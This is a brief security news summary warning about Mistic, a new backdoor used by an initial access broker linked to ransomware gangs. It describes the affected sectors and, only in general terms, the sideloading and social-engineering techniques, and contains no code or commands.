Be on the lookout for Mistic, a new backdoor used by ransomware broker

Be on the lookout for Mistic, a new backdoor used by ransomware broker

🚨 Researchers have identified a new backdoor program named Mistic that has been used in enterprise intrusions since April. This malware is linked to an initial access broker that sells network footholds to ransomware gangs.

Key Highlights:

• Multiple Sectors Affected: Mistic has been deployed on networks belonging to organizations in insurance, education, IT, and professional services.
• Associated Malware: It has been used alongside ModeloRAT, a malware associated with the threat actor Woodgnat (also known as KongTuke).
• Attack Method: The Mistic backdoor is launched through DLL sideloading, a technique that helps avoid detection by executing a legitimate executable first.
• Stealthy Operations: Mistic executes in memory and has a built-in kill switch, allowing for long-term stealthy access for attackers.

Attack Campaigns:

The Woodgnat group’s campaigns often trick users into executing malicious PowerShell commands using social engineering tactics, including fake CAPTCHA tests and impersonating IT support on Microsoft Teams.

Conclusion:

The emergence of Mistic highlights the return of custom malware tools by ransomware gangs, moving away from solely relying on dual-use system administration tools. The Symantec report includes indicators of compromise for this new backdoor and other malicious files used in recent attacks.

Read full article